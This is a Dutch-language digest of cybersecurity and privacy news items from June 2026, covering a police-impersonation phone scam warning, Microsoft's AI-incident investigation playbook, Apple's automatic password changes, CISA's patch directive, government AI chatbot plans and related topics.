Woodrow Hartzog, hoogleraar privacyrecht aan de Boston University, uitte zijn zorgen tegenover Wired over de normalisering van dergelijke technologieën. Hij merkte op: "We weten dat hoe meer deze systemen worden ingezet, hoe meer mensen ze als normaal beschouwen." Hartzog voegde eraan toe dat naarmate mensen de aanwezigheid van dit soort systemen als gewoner en vanzelfsprekender ervaren, ze sneller een morele overtuiging zullen ontwikkelen over de wenselijkheid van het scannen van gezichten.

Op 5 juni heeft Meta een update voor de app met AI uitgebracht, waarbij de betreffende code voor gezichtsherkenning is verwijderd. De EFF waarschuwt echter dat deze actie niet automatisch betekent dat het technologiebedrijf definitief heeft afgezien van plannen om de camerabrillen in de toekomst van gezichtsherkenning te voorzien. Meta zelf heeft tegenover Wired geen specifieke reden willen geven voor de verwijdering van de code. Het bedrijf bestempelt eerdere berichtgeving van het magazine als misleidend en benadrukt dat er nog geen definitieve beslissingen zijn genomen over de implementatie van gezichtsherkenning. Eerder dit jaar rapporteerde The New York Times dat Meta van plan was de eigen camerabrillen dit jaar nog uit te rusten met gezichtsherkenning.

 

Bron: Meta

10 juni 2026 | Fraudehelpdesk waarschuwt voor nepoproepen Nationale Politie en Hoge Raad

De Fraudehelpdesk ontvangt opnieuw meldingen over telefoontjes met een Nederlands gesproken bandje, die qua inhoud overeenkomen met eerdere waarschuwingen over Engelstalige varianten. Slachtoffers worden gebeld en horen een bandje dat beweert afkomstig te zijn van instanties zoals de 'Nationale politie Amsterdam', de 'National Police', de 'Dutch Supreme Court' (de Hoge Raad der Nederlanden), het 'Ministry of Justice', een Europese bank, de Deense politie of het Deense hooggerechtshof.

De inkomende telefoontjes lijken afkomstig van Nederlandse mobiele nummers, of van vaste lijnen van de Hoge Raad of de Rijksoverheid. Dit is echter het resultaat van 'spoofing', een techniek waarbij oplichters een ander telefoonnummer kunnen tonen dan het nummer waarmee zij daadwerkelijk bellen. De gespoofde telefoonnummers behoren toe aan particulieren of ondernemers die geen enkele connectie hebben met de oplichtingspraktijken.

De boodschap aan de telefoon varieert, maar omvat doorgaans beweringen dat het BSN-nummer van de ontvanger wordt misbruikt, dat er een arrestatiebevel tegen de persoon loopt, of dat de ontvanger verdacht wordt van criminele activiteiten zoals drugshandel en witwassen. Vervolgens wordt de ontvanger gevraagd het cijfer 1 in te toetsen om doorverbonden te worden met een zogenaamde 'agent'. Deze 'agent' vraagt vervolgens naar persoonlijke gegevens om de identiteit van het slachtoffer te 'bevestigen'.

In sommige gevallen wordt slachtoffers gevraagd hun geld 'veilig te stellen' door het over te maken naar een specifiek rekeningnummer. Bij andere incidenten wordt verzocht om een programmaatje te downloaden, wat de beller in staat stelt mee te kijken en handelingen uit te voeren op de computer van het slachtoffer. Een andere tactiek is dat melders geld op hun rekening gestort krijgen, dat zij vervolgens moeten overboeken naar verschillende andere rekeningnummers of een cryptowallet.

De Fraudehelpdesk adviseert dringend om alert te blijven op toekomstig telefoonverkeer en onbekende telefoonnummers niet terug te bellen. Maak nooit geld over op basis van een ongevraagd bericht of telefoontje, maar verbreek direct de verbinding. Geef geen persoonlijke gegevens door en download geen software op verzoek van een onbekende. Het overmaken van geld dat eerst op uw rekening is gestort door oplichters, kan ertoe leiden dat uw bank uw rekening blokkeert vanwege verdachte transacties. Neem in zo'n geval contact op met uw bank. Indien slechts uw naam, adres en de laatste drie cijfers van uw BSN zijn doorgegeven, zal dit niet direct grote gevolgen hebben, maar criminelen kunnen deze informatie wel gebruiken om in de toekomst overtuigender over te komen. Wanneer u toch geld heeft overgemaakt, gegevens heeft aangeleverd of software heeft gedownload, wordt aangeraden contact op te nemen met de Fraudehelpdesk voor persoonlijk advies. Deze waarschuwing is eerder gepubliceerd op 19 juni 2024.

 

Bron: Fraudehelpdesk

10 juni 2026 | Microsoft lanceert playbook voor onderzoek naar AI activiteit

Microsoft heeft een nieuw onderzoeksplaybook gepubliceerd dat securityteams moet helpen bij het reconstrueren van activiteiten binnen systemen met kunstmatige intelligentie (AI), zoals Microsoft 365 Copilot en Azure AI services. Deze AI-systemen zijn inmiddels een integraal onderdeel van de dagelijkse bedrijfsvoering, wat de noodzaak creëert voor een consistente methode om incidenten te onderzoeken.

Securityteams worden nu al geconfronteerd met onderzoeken naar activiteiten die gerelateerd zijn aan AI, variërend van pogingen tot 'prompt injection' tot onverwachte datatoegang. Hoewel de signalen van dergelijke interacties waarneembaar zijn via telemetrie van Microsoft Purview, Defender en Sentinel, ontbrak het tot nu toe aan een gestructureerde aanpak om deze signalen om te zetten in een coherent beeld van wat er daadwerkelijk is gebeurd.

Het nieuwe playbook biedt een gestructureerde aanpak voor het onderzoeken van activiteiten gerelateerd aan AI, gebruikmakend van de telemetrie die reeds beschikbaar is binnen de beveiligingsproducten van Microsoft. Deze telemetrie legt vast wie een interactie heeft geïnitieerd, wanneer deze plaatsvond en welke bronnen daarbij betrokken waren. Dit vormt de basis voor het reconstrueren van activiteiten met AI in bedrijfsomgevingen.

De methodologie volgt een 'scope-context-signal'-volgorde. Een onderzoek begint met het identificeren van de gebruiker, het tijdstip en de betrokken services met AI. Vervolgens wordt de context van de bronnen verbreed, namelijk welke systemen zijn benaderd, welke data mogelijk zijn blootgesteld en hoe deze activiteiten overeenkomen met verwacht gedrag. Detectiesignalen, zoals pogingen tot prompt injection, afwijkende gebruikspatronen of waarschuwingen voor blootgestelde credentials, worden vervolgens geëvalueerd binnen deze bredere keten van activiteiten.

De telemetrie van interacties met AI is metadata-gedreven, waardoor identiteit, tijd en broncontext over interacties heen worden geboden. Deze structuur transformeert geïsoleerde signalen naar een samenhangend verslag. Door deze elementen gezamenlijk te analyseren, kunnen onderzoekers vaststellen wat er is gebeurd, de impact ervan begrijpen en bepalen of de activiteit duidt op normaal gebruik, beleidsovertredingen of indicatoren van compromittering.

Het playbook operationaliseert deze aanpak voor Microsoft 365 Copilot en Azure AI services. Het bundelt de benodigde configuratie, KQL-queries en detectiepatronen in één werkmodel, inclusief schemareferenties en detectielogica. Dit stelt onderzoekers in staat om activiteiten met AI over verschillende tools heen te volgen met minder ad-hoc wisselingen. Het model is ook uitgebreid naar systemen op basis van agents, waarbij het onderzoek omvat welke agents zijn ingezet, hoe ze zijn geconfigureerd, tot welke data ze toegang hebben en of die autorisatie zoals verwacht is gebruikt.

Het resultaat is een praktische handleiding die responsteams helpt om van geïsoleerde signalen naar een gereconstrueerd verslag van waargenomen activiteit te gaan. Het maakt het mogelijk om het gebruik van AI af te bakenen, te begrijpen welke data tijdens interacties is benaderd en te beoordelen of het waargenomen gedrag consistent is met normaal gebruik, beleidsovertredingen of actieve dreigingen binnen de beveiligingsdiensten van Microsoft. De capaciteit om te bepalen wat er is gebeurd, welke data betrokken was en of activiteit geautoriseerd was, wordt een kernfunctionaliteit voor incident response.

 

Bron: Microsoft | Bron 2: aka.ms

10 juni 2026 | Nieuwe AI optie van Apple voor automatisch wijzigen van wachtwoorden roept vragen op

Apple heeft een nieuwe AI-optie voor iOS aangekondigd die de wachtwoordmanager Passwords in staat stelt om automatisch zwakke en gelekte wachtwoorden voor gebruikers te wijzigen. Deze functionaliteit, die beschikbaar komt in iOS 27, bouwt voort op de bestaande waarschuwingsfunctie van de Passwords app, die gebruikers reeds informeerde over problemen met hun inloggegevens, zoals het voorkomen in bekende datalekken. Met de integratie van Safari en Apple Intelligence kan het systeem straks proactief actie ondernemen.

Volgens Apple logt de functie namens de gebruiker in op de betreffende websites en creëert vervolgens een nieuw, sterk wachtwoord. Apple benadrukt dat het AI model zowel op het apparaat zelf als op servers draait die gebruikmaken van Private Cloud Compute. Dit zou de privacy van gebruikers waarborgen. Het bedrijf stelt dat Private Cloud Compute gebruikers toegang geeft tot geavanceerde intelligentie, terwijl de privacy en beveiliging van de iPhone naar de cloud worden uitgebreid. Apple voegt hieraan toe dat bij het gebruik van Private Cloud Compute persoonlijke data van gebruikers niet wordt opgeslagen of beschikbaar wordt gemaakt voor Apple of andere partijen. iOS 27 wordt later dit jaar verwacht.

De aangekondigde functie roept echter diverse vragen op bij gebruikers en experts, met name over privacy en beveiliging. Er wordt gewezen op potentiële problemen met websites die niet optimaal omgaan met wachtwoordmanagers, bijvoorbeeld wanneer een derde identiteitsprovider wordt gebruikt. Ook zijn er twijfels geuit over de privacybeloftes van Apple, waarbij men zich afvraagt of Apple zelf toegang krijgt tot de accounts wanneer zij wachtwoorden kan aanpassen.

Verder bestaan er zorgen over het feit dat het apparaat zonder expliciete controle van de gebruiker inlogt op websites en wijzigingen doorvoert. Dit kan leiden tot onverwachte problemen, zoals het niet meer functioneren van accounts op andere apparaten na een automatische wachtwoordwijziging. De effectiviteit van AI-gegenereerde wachtwoorden wordt eveneens bediscussieerd, waarbij sommigen suggereren dat deze voorspelbaar kunnen zijn en daardoor minder sterk dan gewenst. Ook de mogelijkheid van misbruik via technieken zoals prompt-injection wordt genoemd. Tot slot zijn er bredere zorgen geuit over de toegang van derden, zoals geheime diensten, tot gebruikersdata via private bedrijven die dergelijke diensten aanbieden, wat de implicaties van wetgeving zoals de sleepwet verder zou kunnen versterken.

 

Bron: Apple | Bron 2: schneier.com

10 juni 2026 | Signal waarschuwt voor 'dystopische' Britse eis voor fotocontrole

Chatapp Signal heeft een dringende waarschuwing afgegeven over de Britse eis van premier Starmer om foto's op telefoons van jongeren te controleren. Volgens Signal is dit een "dystopische" combinatie van client-side scanning en leeftijdsverificatie die niet alleen kinderen niet beschermt, maar iedereen in gevaar brengt. Het voorstel zal volgens de organisatie ook de marktdominantie van technologiebedrijven zoals Apple, Google en Microsoft en hun controle over persoonlijke informatie versterken.

De Britse premier Starmer kondigde gisteren aan dat telefoonfabrikanten, waaronder Apple en Google, drie maanden de tijd krijgen om mechanismen te implementeren voor de controle van foto's op telefoons van jongeren. Het doel is om het onmogelijk te maken voor jongeren om naaktfoto's te versturen of te ontvangen. Indien de fabrikanten niet binnen de gestelde termijn met een oplossing komen, dreigt Starmer wetgeving in te voeren om bedrijven hiertoe te verplichten.

Signal benadrukt dat dit een gevaarlijk voorstel is dat alle Britse burgers verplicht hun leeftijd te bewijzen en al hun inhoud te laten scannen, enkel om hun fundamentele recht op communicatie te kunnen uitoefenen. De chatapp vreest dat mogelijkheden voor massasurveillance en censuur, ongeacht de oorspronkelijke intenties, nooit beperkt zullen blijven tot hun initiële doel. Eenmaal gecreëerd, zullen dergelijke systemen worden uitgebreid en een gevaarlijk instrument vormen dat zowel binnen als buiten het Verenigd Koninkrijk zal worden gebruikt om alles te censureren en te controleren wat als "dreigingen" of "schadelijke inhoud" wordt beschouwd.

De organisatie vreest specifiek dat de controle van naaktfoto's vandaag, morgen zal worden uitgebreid naar politieke opvattingen. Signal stelt dat echte kinderbescherming bestaat uit goed gefinancierd onderwijs, robuuste sociale diensten en zinvolle waarborgen voor de technologie met kunstmatige intelligentie en platforms waarmee de overheid nu zo gretig flirt. In plaats daarvan streeft de Britse regering naar een onzichtbare surveillance infrastructuur, die standaard is ingeschakeld en onder cynische voorwendselen tot wet wordt gemaakt. Dit gebeurt volgens Signal zonder echte aandacht voor de werkelijke behoeften van de kinderen die zij beweren te beschermen, of voor de afschuwelijke en vergaande consequenties die in de praktijk zullen volgen.

 

Bron: Signal | Bron 2: youtu.be | Bron 3: patreon.com

10 juni 2026 | Aangeboden dataset van softwarebedrijf Linear blijkt vervalst

Een recent aangeboden dataset op een cybercrimeforum, die werd gepresenteerd als gestolen informatie van Linear, de ontwikkelaar van projectmanagementsoftware, is volledig ontmaskerd als vervalst. Tuomas Artman, medeoprichter van Linear, heeft de authenticiteit van de data persoonlijk onderzocht. Hij concludeerde na analyse van opgevraagde sampledata bij de aanbieder dat de gegevens willekeurig waren gegenereerd.

Artman deelde zijn bevindingen transparant op X, waar hij aantoonde dat de geclaimde dataset onmogelijk authentiek kon zijn. Een doorslaggevend detail was de bewering dat de dataset gehashte wachtwoorden zou bevatten. Linear slaat echter geen wachtwoorden of wachtwoordhashes op. Het inlogproces bij Linear verloopt uitsluitend via SAML (Security Assertion Markup Language) en zogeheten magic links, waardoor een traditionele wachtwoordoptie simpelweg niet bestaat. De geclaimde inhoud van de dataset is daarmee fundamenteel onjuist.

Dit incident benadrukt een groeiende trend waarbij cybercriminelen volledig gefabriceerde datasets te koop aanbieden, uitsluitend om financieel gewin te behalen door misbruik te maken van de naam van bekende bedrijven. Voor organisaties biedt deze zaak een belangrijke les, het is cruciaal om elke geclaimde dataset grondig en inhoudelijk te verifiëren voordat er definitieve conclusies worden getrokken. De transparante en publieke reactie van Linear heeft bovendien laten zien hoe dergelijke acties effectief kunnen voorkomen dat er paniek ontstaat bij klanten.

 

Bron: Linear

11 juni 2026 | CISA stelt federale instanties 3 dagen termijn voor patch kritieke kwetsbaarheden

De Amerikaanse Cybersecurity and Infrastructure Security Agency (CISA) heeft een nieuwe bindende operationele richtlijn (BOD 26-04) uitgevaardigd. Deze richtlijn verplicht federale civiele instanties om bepaalde cyber kwetsbaarheden binnen drie dagen te patchen. De maatregel is onderdeel van een prioritiseringssysteem dat de verhoogde dreigingsomgeving, veroorzaakt door de opkomst van kunstmatige intelligentie (AI), moet aanpakken.

De richtlijn, die afgelopen woensdag werd gepubliceerd, omvat vier criteria voor het beoordelen van de ernst van een kwetsbaarheid. Deze criteria zijn onder meer of de kwetsbaarheid blootgesteld is aan het publieke internet, of de kwetsbaarheid is opgenomen in de catalogus van bekende geëxploiteerde kwetsbaarheden (KEV), of de exploit geautomatiseerd kan worden, en welk niveau van controle een aanvaller over een kwetsbaar systeem kan verkrijgen als gevolg van de kwaadaardige activiteit. Dit werd toegelicht door Chris Butera, CISA Acting Executive Assistant Director voor Cybersecurity, tijdens een gesprek met verslaggevers.

Federale instanties zullen kwetsbaarheden die aan drie van deze vier criteria voldoen, binnen 72 uur moeten patchen. CISA geeft de instanties 180 dagen de tijd om het nieuwe patching tijdframe te implementeren. Specifiek zal de driedaagse termijn gelden voor momenteel geëxploiteerde kwetsbaarheden die geautomatiseerd kunnen worden en kwaadwillende actoren enige controle zouden geven over internetgerichte systemen.

Wanneer instanties vaststellen dat hackers een kwetsbaarheid kunnen gebruiken om volledige controle over een systeem te verkrijgen, moeten zij systemen onderzoeken om te bepalen of deze zijn gecompromitteerd en vervolgens binnen drie dagen patchen. Voor kwetsbaarheden die aan de bovengenoemde criteria voldoen maar niet automatiseerbaar zijn, en waarbij een dreigingsactor nog geen volledige controle heeft verkregen, krijgen instanties maximaal twee weken de tijd om te patchen. De richtlijn schrijft ook voor dat instanties moeten controleren wanneer en hoe een kwetsbaar systeem is gecompromitteerd voordat zij een patch toepassen. Een persbericht van CISA benadrukt dat "het toepassen van een patch over het algemeen een dreigingsactor niet verdrijft".

CISA dringt er sterk op aan dat statelijke, tribale en lokale overheden, evenals eigenaren en exploitanten van kritieke infrastructuur, soortgelijke kwetsbaarheid management regimes invoeren. Butera verklaarde dat deze nieuwe richtlijn de cyberverdediging van civiele federale overheidsinformatiesystemen versnelt en prioriteert, waarbij de aandacht van IT en beveiligingsactiviteiten wordt gericht op de meest risicovolle activa. Hij benadrukte de urgentie, gezien de vooruitgang in AI die dreigingsactoren in staat stelt kwetsbaarheden in deze activa sneller te vinden en te exploiteren. "Verdedigers kunnen het zich niet veroorloven om weken te wachten met het patchen van systemen die massaal en autonoom kunnen worden geëxploiteerd," voegde Butera toe.

CISA is ervan overtuigd dat instanties de werkzaamheden binnen drie dagen kunnen uitvoeren en zal instanties ondersteunen die hulp nodig hebben bij de uitvoering binnen de strakke termijn. Uit een onderzoek van CISA bij één federale instantie bleek dat slechts 1% van de kwetsbaarheden binnen drie dagen gepatcht moest worden, terwijl meer dan 60% minder ernstig was en pas bij de volgende systeemupdate gepatcht hoefde te worden. Nick Andersen, waarnemend directeur van CISA, stelde dat de richtlijn duidelijke definities, tijdlijnen en criteria biedt die de transparantie, voorspelbaarheid en de resourceplanning van instanties verbeteren voor een effectievere kwetsbaarheid remediëring. Gelijktijdig introduceerde senator Mark Warner (D-VA) wetgeving die CISA opdraagt samen te werken met de industrie en regelgevende instanties om cyberbeveiliging te moderniseren, eveneens met het oog op de snelle evolutie van AI.

 

Bron: CISA

11 juni 2026 | DNS Belgium migreert domeinregistratieplatform naar open source PostgreSQL

DNS Belgium, de beheerder van de .be-, .brussels- en .vlaanderen-domeinnamen, heeft haar registratieplatform gemigreerd van een Oracle database naar het open source alternatief PostgreSQL. Deze strategische overstap is gericht op het vergroten van de onafhankelijkheid van Amerikaanse technologie en het verkrijgen van extra controle over data. Bovendien bereidt de migratie het platform voor op een toekomstige verhuizing weg van Amazon Web Services (AWS).

Kristof Tuyteleers, CISO bij DNS Belgium, benadrukte in een gesprek met ITdaily dat "het afbouwen van niet-Europese technologie een nieuwe strategische prioriteit is." Door deze migratie naar PostgreSQL kan DNS Belgium haar platform grondig testen en optimaliseren ter voorbereiding op de aanstaande cloudverhuizing.

De keuze voor open source PostgreSQL is weloverwogen, ondanks de Amerikaanse oorsprong van de database. DNS Belgium stelt dat de open source licentie ervoor zorgt dat de database niet valt onder Amerikaanse wetgeving, wat extra zekerheid biedt met betrekking tot dataprivacy en de naleving van Europese regelgeving. PostgreSQL wordt geacht voldoende stabiliteit, functionaliteit en transparantie te leveren voor de kritieke internetinfrastructuur die DNS Belgium beheert.

De overgang naar PostgreSQL is ook ingegeven door de wens om de afhankelijkheid van grote Amerikaanse leveranciers te verminderen en te ontsnappen aan de striktere licentiepolitiek van Oracle. Volgens DNS Belgium blijken licenties voor Oracle in een soevereine Europese cloud of op eigen infrastructuur minder flexibel en vaak duurder te zijn. Aangezien PostgreSQL open source is, behoudt DNS Belgium de vrijheid om de databaseomgeving aan te passen en te beheren, zonder gebonden te zijn aan één specifieke leverancier of landgebonden wetgeving.

De migratie zelf werd uitgevoerd met een datamigratietool van Amazon. Tijdens dit proces is de database opgeschoond en geoptimaliseerd door overbodige data en verouderde processen te verwijderen. Tevens is het beheer verder geautomatiseerd, waardoor de test- en productieomgevingen nu identiek zijn.

 

Bron: ITdaily

11 juni 2026 | Kabinet stimuleert gebruik van eigen AI chatbot door ambtenaren

Het Nederlandse kabinet heeft de ambitie uitgesproken om het gebruik van de AI chatbot vlam-chat binnen de rijksoverheid aanzienlijk verder op te schalen. Minister Herbert van Economische Zaken maakte deze intentie bekend in antwoord op specifieke vragen van de vaste Kamercommissie Digitale Zaken van de Tweede Kamer. Vlam-chat, een naam die staat voor 'Veilige Lokale AI Modellen', is een innovatief initiatief dat geheel is ontwikkeld door SSC-ICT, een van de grootste en meest cruciale ict-dienstverleners voor de Nederlandse overheid. De ontwikkeling van een eigen, veilige AI-oplossing toont de strategische focus op digitale autonomie en gegevensbescherming.

Deze speciaal ontworpen AI chatbot functioneert als een soeverein en betrouwbaar alternatief voor de veelgebruikte commerciële chatbots, zoals ChatGPT, Claude of Gemini. Het soevereine karakter van vlam-chat betekent concreet dat het systeem volledig operationeel is binnen een eigen datacenter van de overheid. Bovendien maakt het uitsluitend gebruik van Europese taalmodellen, wat een hoge mate van controle over de verwerking van data en de onderliggende processen garandeert. Het primaire doel van de chatbot is om ambtenaren effectief te ondersteunen bij een breed scala aan taken, waaronder het opstellen en bewerken van teksten, het efficiënt maken van samenvattingen, het uitvoeren van vertalingen, en het faciliteren van brainstormsessies en sparren over diverse onderwerpen. Het draagt bij aan een efficiëntere en nauwkeurigere ambtelijke communicatie.

Volgens de verklaringen van minister Herbert wordt vlam-chat op dit moment al actief geïmplementeerd bij meerdere afdelingen binnen het ministerie van Binnenlandse Zaken. Daarnaast lopen er succesvolle pilotprojecten met de chatbot bij verschillende andere overheidsorganisaties, waarbij waardevolle ervaringen worden opgedaan. Een grootschalige, brede uitrol van vlam-chat staat gepland voor de tweede helft van dit jaar, wat de ambitie van het kabinet onderstreept om deze technologie breed toegankelijk te maken. De minister benadrukte wel dat, hoewel de overheid streeft naar een brede adoptie, individuele overheidsorganisaties autonoom blijven in hun uiteindelijke keuze om de toepassing wel of niet af te nemen. Niettemin wordt er daadwerkelijk vormgegeven aan een uitrol die de hele rijksoverheid kan omvatten.

Een essentieel aspect van de implementatie van vlam-chat betreft de zorgvuldige omgang met gevoelige informatie. De bewindsvrouw verklaarde expliciet dat er op dit moment nog geen vertrouwelijke of privacygevoelige informatie wordt verwerkt via de chatbot. Dit betekent dat de huidige inzet strikt gericht is op ondersteuningstaken die geen toegang vereisen tot dergelijke gevoelige data. De ontwikkeling en gefaseerde implementatie van vlam-chat benadrukken de inspanningen van de Nederlandse overheid om innovatieve digitale technologieën zoals AI te omarmen. Tegelijkertijd wordt er intensief aandacht besteed aan fundamentele principes zoals veiligheid, soevereiniteit en de bescherming van de privacy in alle digitale oplossingen die worden geïntroduceerd.

 

Bron: Tweede Kamer

11 juni 2026 | Versterking van identiteitsverificatie essentieel tegen toenemende cyberdreigingen

De diefstal van inloggegevens is in 2025 met 160% toegenomen, waarbij één op de vijf datalekken hierdoor werd veroorzaakt. Aanvallers maken steeds vaker gebruik van door AI gestuurde aanvallen om traditionele verdedigingsmechanismen te omzeilen. Dit stelt beveiligingsteams voor de uitdaging om identiteiten veilig te verifiëren zonder legitieme gebruikers te hinderen. Zwakke onboardingprocessen, een te grote afhankelijkheid van statische inloggegevens en inconsistente authenticatiebeleid creëren allemaal mogelijkheden voor aanvallers. Het waarborgen van een zo veilig mogelijke identiteitsverificatie is daarom een cruciaal onderdeel geworden van moderne cyberweerbaarheid.

Organisaties kunnen diverse praktijken toepassen om identiteitsverificatie te versterken en veerkrachtigere toegangscontroles over hun netwerken op te bouwen. Een van de meest effectieve methoden is het gebruik van sterke, vermoeidheidsbestendige meerfactorauthenticatie (MFA). MFA vereist twee of meer verificatiefactoren uit verschillende categorieën: 'iets dat je weet' (zoals een wachtwoord of pincode), 'iets dat je hebt' (zoals een smartphone, authenticator-app of hardware-beveiligingssleutel) en 'iets dat je bent' (zoals een vingerafdruk of gezichtsscan). Volgens de richtlijnen van NIST is MFA het sterkst wanneer factoren uit verschillende categorieën worden gecombineerd. Een wachtwoord in combinatie met een hardwaretoken of authenticator-app biedt aanzienlijk betere bescherming dan uitsluitend te vertrouwen op meerdere kennisgebaseerde factoren.

MFA is echter niet immuun voor misbruik; zwakkere implementaties zijn kwetsbaar voor aanvallen zoals prompt bombing en SIM-swapping. Om de veerkracht tegen deze technieken te verbeteren, wordt organisaties aangeraden om afstand te nemen van verouderde sms- of e-mailgebaseerde eenmalige wachtwoorden (OTP's), die kwetsbaarder zijn voor onderschepping, phishing en social engineering. Prioriteit moet worden gegeven aan phishing-resistente MFA-methoden, zoals FIDO2-beveiligingssleutels, passkeys of certificaatgebaseerde authenticatie. Waar passend, moeten authenticator-apps worden gebruikt die lokale OTP's genereren in plaats van push-gebaseerde goedkeuringsprompts. Uit een rapport van Verizon blijkt dat gestolen inloggegevens betrokken zijn bij 44,7% van alle datalekken.

Een andere cruciale praktijk is het beveiligen van de servicedesk tegen social engineering. Helpdesks blijven een veelvoorkomend doelwit voor social engineering aanvallen, omdat zij de schakel vormen tussen identiteit, toegang en dringende gebruikersverzoeken. Aanvallers doen zich voor als medewerkers om supportmedewerkers te overtuigen toegang te krijgen tot accounts, meestal via een resetverzoek. Deze aanvallen worden steeds geraffineerder, waarbij dreigingsactoren AI-gestuurde deepfake audio of openbaar beschikbare informatie gebruiken om verzoeken legitiem te laten lijken. Bij verschillende spraakmakende datalekken, waaronder die bij Marks and Spencer (M&S) en Clorox, was een gecompromitteerde servicedesk de eerste stap naar de implementatie van ransomware of bredere laterale beweging binnen het netwerk. In het geval van M&S resulteerde de aanval in een vijfdaagse opschorting van de verkoop, met een gemiddeld dagelijks verlies van 3,8 miljoen pond. Het probleem ligt zelden in een gebrek aan beveiligingstools, maar eerder in inconsistente identiteitsverificatie tijdens stressvolle supportinteracties. Het is cruciaal om veilige identiteitsverificatie direct in de helpdeskworkflows te integreren, waarbij gebruikers hun identiteit moeten verifiëren via vertrouwde authenticatiemethoden voordat wachtwoordresets, MFA-wijzigingen of andere gevoelige acties kunnen worden voltooid. Dit helpt supportteams verzoeken veilig af te handelen en vermindert het risico dat aanvallers via social engineering beveiligingscontroles omzeilen.

 

Bron: Specops Software | Bron 2: itpro.com

11 juni 2026 | Belastingdienst schakelt Adobe Analytics uit in betaalomgeving na privacybezwaren

De Belastingdienst heeft Adobe Analytics tijdelijk uitgeschakeld in haar betaalomgeving. Deze beslissing volgt op bevindingen van onafhankelijk onderzoeker Mick Beer en daaropvolgende Kamervragen. De fiscus is tevens gestart met een onderzoek naar de redenen waarom de tracker van Adobe oorspronkelijk is geïnstalleerd, zo heeft een woordvoerder aan NRC bevestigd.

Onlangs publiceerde onderzoeker Mick Beer een artikel waarin hij uiteenzette hoe Adobe diverse gegevens ontving van personen die hun belastingaanslagen betaalden bij de Belastingdienst. Het betrof onder meer specifieke informatie over vorderingen en geopende aanslagen. Volgens Beer ligt het juridische probleem niet zozeer in de doorgifte van gegevens naar de Verenigde Staten, aangezien deze in principe gedekt wordt door het bestaande verdrag tussen de Europese Unie en de VS. De kern van de kwestie is echter het ontbreken van een grondslag onder de Algemene Verordening Gegevensbescherming (AVG) en het gebrek aan expliciete toestemming voor het plaatsen en uitlezen van deze trackers. De e-privacy regels en de Telecommunicatiewet vereisen deze toestemming wel. Beer wees daarbij op een eerdere boete die de Autoriteit Persoonsgegevens (AP) aan Kruidvat oplegde voor vergelijkbare trackingpraktijken.

Naar aanleiding van het artikel van Mick Beer stelde Kamerlid Van den Berg van JA21 vragen aan staatssecretarissen Eerenberg van Financiën en Aerdts voor Digitale Economie. De vragen betroffen onder meer de mogelijkheid van een onderzoek naar het verzenden van gegevens over de betaalflow aan Adobe Analytics. Tevens werd gevraagd om de tracker tijdelijk stop te zetten totdat de rechtmatigheid en proportionaliteit ervan overtuigend zijn vastgesteld.

De Belastingdienst heeft hierop gereageerd door de tracker van Adobe voorlopig uit te schakelen en een onderzoek in te stellen naar de installatie ervan. Daarnaast bedankte de Belastingdienst de onderzoeker voor zijn publicatie. De Kamervragen van Van den Berg zijn op het moment van schrijven nog niet officieel beantwoord.

 

Bron: Belastingdienst

11 juni 2026 | Europese privacytoezichthouders introduceren standaardformulier voor datalekmeldingen

De European Data Protection Board (EDPB), het overkoepelende orgaan van de Europese privacytoezichthouders, heeft een significante stap gezet in de standaardisatie van datalekmeldingen binnen de Europese Unie. Op 10 juni 2026 heeft de EDPB een standaardformulier gepresenteerd dat alle organisaties in de EU kunnen gebruiken wanneer zij te maken krijgen met een datalek. Dit initiatief is gericht op het verbeteren van de structuur, harmonisatie en uniformiteit van het meldingsproces voor datalekken, zowel voor de meldende organisaties als voor de ontvangende privacytoezichthouders.

Het primaire doel van dit standaardformulier is ervoor te zorgen dat elke datalekmelding alle essentiële informatie bevat die organisaties verplicht zijn te verstrekken onder de Algemene Verordening Gegevensbescherming (AVG). Dit omvat cruciale details zoals de specifieke categorieën van persoonlijke gegevens die zijn gelekt, de exacte datum en het tijdstip van de ontdekking van het datalek, en een inschatting van het aantal betrokken personen of "slachtoffers" van het incident. Door deze gestandaardiseerde aanpak hoopt de EDPB de kwaliteit en volledigheid van de meldingen aanzienlijk te verhogen.

Daarnaast is het formulier ontworpen om het meldingsproces voor organisaties te vereenvoudigen. Een gestructureerd en duidelijk format moet het voor bedrijven en instellingen gemakkelijker maken om een datalek tijdig en correct te rapporteren, wat een belangrijke verplichting is onder de AVG. Voor privacytoezichthouders biedt het formulier het voordeel dat zij de impact en ernst van gemelde datalekken efficiënter en consistenter kunnen beoordelen. Dit draagt bij aan een effectievere en uniformere handhaving van de privacyregels in alle lidstaten van de EU. De harmonisatie van de meldingen stelt toezichthouders in staat om trends en patronen in datalekken beter te analyseren en gerichte maatregelen te nemen.

Het publiek heeft de gelegenheid om tot 5 augustus 2026 feedback te geven op het voorgestelde standaardformulier, als onderdeel van een openbare consultatie. Na het sluiten van deze consultatieperiode zal de European Data Protection Board een gedetailleerde tijdlijn opstellen voor de gefaseerde implementatie en uitrol van het formulier onder alle Europese privacytoezichthouders. Dit initiatief onderstreept het voortdurende streven naar een robuuster en transparanter kader voor gegevensbescherming binnen de Europese Unie.

 

Bron: EDPB

11 juni 2026 | Rapport onthult toenemende complexiteit in cloudbeveiliging door gefragmenteerde tools

Een recent rapport, de 2026 Cloud Security Report, opgesteld door Cybersecurity Insiders in samenwerking met Fortinet, wijst op een groeiende kloof in cloudcomplexiteit. Uit het onderzoek onder 1.163 IT- en cybersecurityprofessionals blijkt dat 69% van de organisaties de wildgroei aan tools en het gebrek aan inzicht beschouwt als de belangrijkste factoren die de effectiviteit van cloudbeveiliging beperken. Deze situatie leidt ertoe dat 66% van de respondenten weinig vertrouwen heeft in hun vermogen om clouddreigingen in realtime te detecteren en hierop te reageren, een stijging ten opzichte van 64% vorig jaar.

De bevindingen duiden op een verergerend probleem, waarbij cloudomgevingen steeds meer verspreid en dynamisch worden. Veel beveiligingsteams blijven echter vertrouwen op losse tools en niet-verbonden telemetrie. Tegelijkertijd maken aanvallers steeds vaker gebruik van automatisering om kwetsbaarheden sneller te vinden en te misbruiken dan teams de signalen kunnen verbinden, wat het moeilijker maakt om risico's te prioriteren en tijdig te reageren. Holger Schulze, oprichter van Cybersecurity Insiders, benadrukt dit: "Beveiligingsteams hebben geen tekort aan waarschuwingen of tools; ze hebben een tekort aan verbonden context. Wanneer signalen verspreid zijn over verschillende consoles, besteden teams hun tijd aan het reconstrueren van wat er is gebeurd, in plaats van te reageren op wat er nu gebeurt. Investeringen in cloudbeveiliging moeten deze handmatige werkzaamheden verminderen en teams helpen te handelen voordat blootstelling leidt tot een compromis."

